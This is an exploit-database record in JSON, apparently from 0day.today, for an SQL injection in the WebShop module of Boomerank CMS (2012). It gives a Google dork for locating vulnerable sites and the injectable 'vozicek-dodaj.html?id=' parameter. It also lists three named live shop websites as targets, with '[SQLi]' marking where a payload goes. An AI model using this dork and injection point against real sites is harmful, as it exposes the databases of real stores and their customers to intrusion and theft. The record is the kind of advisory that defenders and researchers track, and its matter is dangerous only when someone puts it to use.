Exploit for php platform in category web applications
{"id": "1337DAY-ID-17850", "type": "zdt", "bulletinFamily": "exploit", "title": "Boomerank CMS WebShop-module SQL Injection", "description": "Exploit for php platform in category web applications", "published": "2012-03-28T00:00:00", "modified": "2012-03-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/17850", "reporter": "mr.5p0ng3", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-21T01:35:15", "viewCount": 8, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/17850", "sourceData": "# Exploit Title: Boomerank CMS WebShop-module SQL Injection Vuln.\r\n# Date: 28.03.2012\r\n# Google Dork: inurl:\"vozicek-dodaj.html?id=\" site:.si \r\n# Author: Mr.5p0ng3 [[email\u00a0protected]]\r\n# Software Link: www.boomerank.net (Author's website)\r\n# Version: All\r\n# Tested on: Linux\r\n# Running on: Apache 2.2.3\r\n\r\n#[0x1] - About\r\n\r\n Boomerank is a CMS which can also be used for a webstore because it is highly modular by design. \r\nIt is also compatible or specially designed for use with DataLab Pantheon Information System.\r\n \r\n#[0x2] - Vulnerability\r\n\r\nI have identified 3 SQLi vulnerabilities. 
2 are inconclusive since they don't affect every setup or project in the same manner.\r\nIn some cases the variable is sanitized, in some not!\r\nTherefore I will not go into details with those particular vulnerabilities.\r\n\r\nVulnerability 1:\r\n\r\nWebShop module has a function that allows adding an item to the shopping cart (icon \"V vozi\u010dek\").\r\n\r\nhttp://someurl/vozicek-dodaj.html?id=1' + [SQLi] \r\n\r\n#[0x3] - Live website examples\r\n\r\nhttp://www.pigo.si/vozicek-dodaj.html?id=[SQLi]\r\nhttp://www.naredisisam.si/vozicek-dodaj.html?id=[SQLi]\r\nwww.vedaena.si/vozicek-dodaj.html?id=[SQLi]\r\n....\r\n\r\n#[0x4] - Notes\r\n\r\nNothing to say...\r\n\r\n#[0x5] - Greetz n shit ###################################################\r\n# Special thanks and greetz goes to 1337day Inj3ct0r team and staff. #\r\n# .......................................................................#\r\n# How about a theme song now? Here it goes...Bounce bounce bounce!! #\r\n# Ooooohhhhhhhhhhhh, who lives in the code just under hardware? #\r\n# mr5p0ng3 bob hacker pants!!!!!! #\r\n# .......................................................................# \r\n##########################################################################\r\n//Mr.5p0ng3//[email\u00a0protected]//\r\n\r\n\n\n# 0day.today [2018-02-20] #", "_state": {"dependencies": 1646909706, "score": 1659766679, "epss": 1678811959}}